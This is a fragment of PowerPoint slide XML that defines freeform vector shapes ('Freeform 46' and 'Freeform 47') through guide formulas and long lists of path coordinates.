                  <a:gd name="T67" fmla="*/ 541 h 668"/>
                  <a:gd name="T68" fmla="*/ 431 w 752"/>
                  <a:gd name="T69" fmla="*/ 588 h 668"/>
                  <a:gd name="T70" fmla="*/ 378 w 752"/>
                  <a:gd name="T71" fmla="*/ 625 h 668"/>
                  <a:gd name="T72" fmla="*/ 241 w 752"/>
                  <a:gd name="T73" fmla="*/ 667 h 668"/>
                  <a:gd name="T74" fmla="*/ 157 w 752"/>
                  <a:gd name="T75" fmla="*/ 640 h 668"/>
                  <a:gd name="T76" fmla="*/ 53 w 752"/>
                  <a:gd name="T77" fmla="*/ 530 h 668"/>
                  <a:gd name="T78" fmla="*/ 5 w 752"/>
                  <a:gd name="T79" fmla="*/ 431 h 668"/>
                  <a:gd name="T80" fmla="*/ 0 w 752"/>
                  <a:gd name="T81" fmla="*/ 346 h 668"/>
                  <a:gd name="T82" fmla="*/ 68 w 752"/>
                  <a:gd name="T83" fmla="*/ 242 h 668"/>
                  <a:gd name="T84" fmla="*/ 210 w 752"/>
                  <a:gd name="T85" fmla="*/ 326 h 6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752" h="668">
                    <a:moveTo>
                      <a:pt x="194" y="336"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="194" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="336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8" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7196138" y="2498725"/>
                <a:ext cx="209550" cy="182563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 200 w 584"/>
                  <a:gd name="T1" fmla="*/ 221 h 505"/>
                  <a:gd name="T2" fmla="*/ 158 w 584"/>
                  <a:gd name="T3" fmla="*/ 247 h 505"/>
                  <a:gd name="T4" fmla="*/ 126 w 584"/>
                  <a:gd name="T5" fmla="*/ 278 h 505"/>
                  <a:gd name="T6" fmla="*/ 110 w 584"/>
                  <a:gd name="T7" fmla="*/ 310 h 505"/>
                  <a:gd name="T8" fmla="*/ 110 w 584"/>
                  <a:gd name="T9" fmla="*/ 325 h 505"/>
                  <a:gd name="T10" fmla="*/ 116 w 584"/>
                  <a:gd name="T11" fmla="*/ 347 h 505"/>
                  <a:gd name="T12" fmla="*/ 136 w 584"/>
                  <a:gd name="T13" fmla="*/ 368 h 505"/>
                  <a:gd name="T14" fmla="*/ 168 w 584"/>
                  <a:gd name="T15" fmla="*/ 378 h 505"/>
                  <a:gd name="T16" fmla="*/ 200 w 584"/>
                  <a:gd name="T17" fmla="*/ 378 h 505"/>
                  <a:gd name="T18" fmla="*/ 310 w 584"/>
                  <a:gd name="T19" fmla="*/ 478 h 505"/>
                  <a:gd name="T20" fmla="*/ 263 w 584"/>
                  <a:gd name="T21" fmla="*/ 494 h 505"/>
                  <a:gd name="T22" fmla="*/ 189 w 584"/>
                  <a:gd name="T23" fmla="*/ 504 h 505"/>
                  <a:gd name="T24" fmla="*/ 153 w 584"/>
                  <a:gd name="T25" fmla="*/ 498 h 505"/>
                  <a:gd name="T26" fmla="*/ 89 w 584"/>
                  <a:gd name="T27" fmla="*/ 462 h 505"/>
                  <a:gd name="T28" fmla="*/ 37 w 584"/>
                  <a:gd name="T29" fmla="*/ 394 h 505"/>
                  <a:gd name="T30" fmla="*/ 21 w 584"/>
                  <a:gd name="T31" fmla="*/ 357 h 505"/>
                  <a:gd name="T32" fmla="*/ 0 w 584"/>
                  <a:gd name="T33" fmla="*/ 299 h 505"/>
                  <a:gd name="T34" fmla="*/ 0 w 584"/>
                  <a:gd name="T35" fmla="*/ 273 h 505"/>
                  <a:gd name="T36" fmla="*/ 11 w 584"/>
                  <a:gd name="T37" fmla="*/ 226 h 505"/>
                  <a:gd name="T38" fmla="*/ 32 w 584"/>
                  <a:gd name="T39" fmla="*/ 184 h 505"/>
                  <a:gd name="T40" fmla="*/ 63 w 584"/>
                  <a:gd name="T41" fmla="*/ 147 h 505"/>
                  <a:gd name="T42" fmla="*/ 106 w 584"/>
                  <a:gd name="T43" fmla="*/ 116 h 505"/>
                  <a:gd name="T44" fmla="*/ 195 w 584"/>
                  <a:gd name="T45" fmla="*/ 63 h 505"/>
                  <a:gd name="T46" fmla="*/ 294 w 584"/>
                  <a:gd name="T47" fmla="*/ 16 h 505"/>
                  <a:gd name="T48" fmla="*/ 342 w 584"/>
                  <a:gd name="T49" fmla="*/ 5 h 505"/>
                  <a:gd name="T50" fmla="*/ 389 w 584"/>
                  <a:gd name="T51" fmla="*/ 0 h 505"/>
                  <a:gd name="T52" fmla="*/ 436 w 584"/>
                  <a:gd name="T53" fmla="*/ 10 h 505"/>
                  <a:gd name="T54" fmla="*/ 478 w 584"/>
                  <a:gd name="T55" fmla="*/ 31 h 505"/>
                  <a:gd name="T56" fmla="*/ 499 w 584"/>
                  <a:gd name="T57" fmla="*/ 47 h 505"/>
                  <a:gd name="T58" fmla="*/ 536 w 584"/>
                  <a:gd name="T59" fmla="*/ 89 h 505"/>
                  <a:gd name="T60" fmla="*/ 557 w 584"/>
                  <a:gd name="T61" fmla="*/ 121 h 505"/>
                  <a:gd name="T62" fmla="*/ 583 w 584"/>
                  <a:gd name="T63" fmla="*/ 200 h 505"/>
                  <a:gd name="T64" fmla="*/ 583 w 584"/>
                  <a:gd name="T65" fmla="*/ 221 h 505"/>
                  <a:gd name="T66" fmla="*/ 562 w 584"/>
                  <a:gd name="T67" fmla="*/ 304 h 505"/>
                  <a:gd name="T68" fmla="*/ 536 w 584"/>
                  <a:gd name="T69" fmla="*/ 341 h 505"/>
                  <a:gd name="T70" fmla="*/ 499 w 584"/>
                  <a:gd name="T71" fmla="*/ 373 h 505"/>
                  <a:gd name="T72" fmla="*/ 400 w 584"/>
                  <a:gd name="T73" fmla="*/ 436 h 505"/>
                  <a:gd name="T74" fmla="*/ 236 w 584"/>
                  <a:gd name="T75" fmla="*/ 200 h 505"/>
                  <a:gd name="T76" fmla="*/ 431 w 584"/>
                  <a:gd name="T77" fmla="*/ 257 h 505"/>
                  <a:gd name="T78" fmla="*/ 447 w 584"/>
                  <a:gd name="T79" fmla="*/ 247 h 505"/>
                  <a:gd name="T80" fmla="*/ 462 w 584"/>
                  <a:gd name="T81" fmla="*/ 231 h 505"/>
                  <a:gd name="T82" fmla="*/ 473 w 584"/>
                  <a:gd name="T83" fmla="*/ 200 h 505"/>
                  <a:gd name="T84" fmla="*/ 473 w 584"/>
                  <a:gd name="T85" fmla="*/ 178 h 505"/>
                  <a:gd name="T86" fmla="*/ 467 w 584"/>
                  <a:gd name="T87" fmla="*/ 163 h 505"/>
                  <a:gd name="T88" fmla="*/ 441 w 584"/>
                  <a:gd name="T89" fmla="*/ 137 h 505"/>
                  <a:gd name="T90" fmla="*/ 426 w 584"/>
                  <a:gd name="T91" fmla="*/ 131 h 505"/>
                  <a:gd name="T92" fmla="*/ 404 w 584"/>
                  <a:gd name="T93" fmla="*/ 126 h 505"/>
                  <a:gd name="T94" fmla="*/ 368 w 584"/>
                  <a:gd name="T95" fmla="*/ 137 h 505"/>
                  <a:gd name="T96" fmla="*/ 315 w 584"/>
                  <a:gd name="T97" fmla="*/ 157 h 505"/>
                  <a:gd name="T98" fmla="*/ 383 w 584"/>
                  <a:gd name="T99" fmla="*/ 289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84" h="505">
                    <a:moveTo>
                      <a:pt x="200" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="431" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="431" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="257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9" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7273925" y="2662238"/>
                <a:ext cx="212725" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 430 w 589"/>
                  <a:gd name="T1" fmla="*/ 258 h 495"/>
                  <a:gd name="T2" fmla="*/ 461 w 589"/>
                  <a:gd name="T3" fmla="*/ 237 h 495"/>
                  <a:gd name="T4" fmla="*/ 477 w 589"/>
                  <a:gd name="T5" fmla="*/ 205 h 495"/>
                  <a:gd name="T6" fmla="*/ 477 w 589"/>
                  <a:gd name="T7" fmla="*/ 190 h 495"/>
                  <a:gd name="T8" fmla="*/ 472 w 589"/>
                  <a:gd name="T9" fmla="*/ 174 h 495"/>
                  <a:gd name="T10" fmla="*/ 441 w 589"/>
                  <a:gd name="T11" fmla="*/ 137 h 495"/>
                  <a:gd name="T12" fmla="*/ 425 w 589"/>
                  <a:gd name="T13" fmla="*/ 132 h 495"/>
                  <a:gd name="T14" fmla="*/ 398 w 589"/>
                  <a:gd name="T15" fmla="*/ 132 h 495"/>
                  <a:gd name="T16" fmla="*/ 341 w 589"/>
                  <a:gd name="T17" fmla="*/ 147 h 495"/>
                  <a:gd name="T18" fmla="*/ 262 w 589"/>
                  <a:gd name="T19" fmla="*/ 179 h 495"/>
                  <a:gd name="T20" fmla="*/ 184 w 589"/>
                  <a:gd name="T21" fmla="*/ 216 h 495"/>
                  <a:gd name="T22" fmla="*/ 152 w 589"/>
                  <a:gd name="T23" fmla="*/ 237 h 495"/>
                  <a:gd name="T24" fmla="*/ 131 w 589"/>
                  <a:gd name="T25" fmla="*/ 253 h 495"/>
                  <a:gd name="T26" fmla="*/ 110 w 589"/>
                  <a:gd name="T27" fmla="*/ 289 h 495"/>
                  <a:gd name="T28" fmla="*/ 110 w 589"/>
                  <a:gd name="T29" fmla="*/ 305 h 495"/>
                  <a:gd name="T30" fmla="*/ 115 w 589"/>
                  <a:gd name="T31" fmla="*/ 326 h 495"/>
                  <a:gd name="T32" fmla="*/ 136 w 589"/>
                  <a:gd name="T33" fmla="*/ 352 h 495"/>
                  <a:gd name="T34" fmla="*/ 167 w 589"/>
                  <a:gd name="T35" fmla="*/ 363 h 495"/>
                  <a:gd name="T36" fmla="*/ 184 w 589"/>
                  <a:gd name="T37" fmla="*/ 363 h 495"/>
                  <a:gd name="T38" fmla="*/ 262 w 589"/>
                  <a:gd name="T39" fmla="*/ 337 h 495"/>
                  <a:gd name="T40" fmla="*/ 320 w 589"/>
                  <a:gd name="T41" fmla="*/ 462 h 495"/>
                  <a:gd name="T42" fmla="*/ 225 w 589"/>
                  <a:gd name="T43" fmla="*/ 489 h 495"/>
                  <a:gd name="T44" fmla="*/ 147 w 589"/>
                  <a:gd name="T45" fmla="*/ 489 h 495"/>
                  <a:gd name="T46" fmla="*/ 110 w 589"/>
                  <a:gd name="T47" fmla="*/ 473 h 495"/>
                  <a:gd name="T48" fmla="*/ 52 w 589"/>
                  <a:gd name="T49" fmla="*/ 410 h 495"/>
                  <a:gd name="T50" fmla="*/ 26 w 589"/>
                  <a:gd name="T51" fmla="*/ 363 h 495"/>
                  <a:gd name="T52" fmla="*/ 0 w 589"/>
                  <a:gd name="T53" fmla="*/ 268 h 495"/>
                  <a:gd name="T54" fmla="*/ 0 w 589"/>
                  <a:gd name="T55" fmla="*/ 226 h 495"/>
                  <a:gd name="T56" fmla="*/ 15 w 589"/>
                  <a:gd name="T57" fmla="*/ 190 h 495"/>
                  <a:gd name="T58" fmla="*/ 84 w 589"/>
                  <a:gd name="T59" fmla="*/ 116 h 495"/>
                  <a:gd name="T60" fmla="*/ 136 w 589"/>
                  <a:gd name="T61" fmla="*/ 79 h 495"/>
                  <a:gd name="T62" fmla="*/ 204 w 589"/>
                  <a:gd name="T63" fmla="*/ 47 h 495"/>
                  <a:gd name="T64" fmla="*/ 341 w 589"/>
                  <a:gd name="T65" fmla="*/ 0 h 495"/>
